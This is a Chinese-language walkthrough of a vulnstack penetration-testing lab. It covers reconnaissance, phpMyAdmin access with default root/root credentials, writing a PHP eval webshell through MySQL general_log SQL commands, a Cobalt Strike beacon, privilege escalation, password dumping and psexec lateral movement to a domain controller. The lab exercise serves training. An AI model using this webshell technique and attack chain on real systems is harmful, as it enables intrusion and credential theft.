簡介#
靶場來自:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
簡單的一個靶場,本來用作學生的考核的,但是沒用到,橫向的域滲透也只是用了 cobalt strike 上的 psexec 模塊,主要的內容是熟悉一些滲透的流程。
靶場有很多漏洞都沒法復現成功,環境會有一些問題,但整體的流程沒問題。
環境搭建#
需要關閉加速 3D 圖形,不然無法啟動虛擬機
拓撲圖如下:
網絡設置如下,用到 VMnet2 和 VMnet8:
web 伺服器(VM1) - win7(雙網卡,NAT 模式 + vmnet2(host-only))
ip:192.168.111.128 和 192.168.52.143
開啟 phpstudy
DNS 指向 DC
win2008 DC(VM3)
ip:192.168.52.138
win03 域成員(vm2)
ip:192.168.52.141
查看當前的域
滲透過程#
信息收集#
nmap 端口掃描#
御劍掃描#
目錄掃描#
phpinfo 頁面
phpmyadmin 登錄#
若密碼:root/root
phpmyadmin getshell#
通過日誌 getshell
查看日誌是否開啟記錄及日誌存儲位置:SHOW VARIABLES LIKE "general_log%";
開啟日誌:set global general_log='on';
查詢是否開啟:SHOW VARIABLES LIKE "general_log%"
設置寫入的日誌文件為惡意文件,需要先找到網站目錄
設置日誌路徑:set global general_log_file ='C:\\phpStudy\\WWW\\s.php';
設置成功
準備工作好後,開始寫馬。只需要通過 sql 語句查詢即可
select "<?php @eval($_POST[cmd]);?>";
訪問 webshell:
http://192.168.111.128/ss.php
蟻劍連接:
網站的 80 端口是 yxcms
登錄後台,一樣可以執行 sql 語句
webshell 查看 ip 地址
發現雙網卡
cs 啟動#
上線到 cobalt strike 上操作
服務端
客戶端
建立監聽
生成 payload
payload 上傳至蟻劍執行
運行 exe,cs 上線
sleep 0
shell whoami
提權#
cs 上用 getsystem 一鍵提權,獲取 system 權限
內網信息收集#
點擊 target 發現三台機器,如果點開沒有,端口掃描一下就有了
dumphash
獲取明文密碼
橫向移動#
獲取到密碼後,通過 psexec 橫向移動,這裡主要是三台機器的密碼都是一樣的,如果不一樣,就無法通過 smb 橫向移動了。
選擇 psexec64,64 位
獲取域控伺服器
同樣的方式控制 141,win2003 那台域成員機器
需要選擇 psexec,32 位
查看下 ip
